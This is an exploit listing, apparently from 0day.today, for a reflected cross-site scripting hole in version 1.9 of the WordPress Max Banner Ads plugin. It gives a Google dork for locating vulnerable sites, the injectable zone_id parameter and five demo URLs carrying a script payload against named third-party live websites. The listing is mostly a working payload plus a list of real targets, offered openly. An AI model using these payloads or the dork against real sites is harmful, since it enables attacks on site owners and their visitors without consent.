WordPress Plugin Max Banner Ads XSS Vulnerablity

2014-09-18T00:00:00
ID 1337DAY-ID-22654
Type zdt
Reporter null_pointer
Modified 2014-09-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Exploit Title : WordPress Plugin Max Banner Ads XSS Vulnerablity

Exploit Author : NULL_Pointer

Date : 18/09/2014

Vendor Homepage : http://www.maxblogpress.com/plugins/mba/

Version: 1.9

Google Dork : inurl:/wp-content/plugins/max-banner-ads/

Tested on : Linux, Windows 7
----------------------------------------------------------

WordPress Max Banner Ads plugin suffers from a Cross Site Scripting (XSS) vulnerability.

Exploit : http://127.0.0.1/wp-content/plugins/max-banner-ads/max-banner-ads-lib/include/info.php?zone_id=[XSS]

Demo Sites :

http://mehanik.net.ua/wp-content/plugins/max-banner-ads/max-banner-ads-lib/include/info.php?zone_id=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E

http://body-fitness.net.ua/wp-content/plugins/max-banner-ads/max-banner-ads-lib/include/info.php?zone_id=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E

http://www.conseils-coaching-jardinage.fr/wp-content/plugins/max-banner-ads/max-banner-ads-lib/include/info.php?zone_id=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E

http://shopping-internet.fr/wp-content/plugins/max-banner-ads/max-banner-ads-lib/include/info.php?zone_id=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E

http://www.przepisnadom.pl/wp-content/plugins/max-banner-ads/max-banner-ads-lib/include/info.php?zone_id=%3Cscript%3Ealert%28/NULL_Pointer/%29%3C/script%3E

p0c : http://im75.gulfup.com/8BgxzH.png

#  0day.today [2018-02-18]  #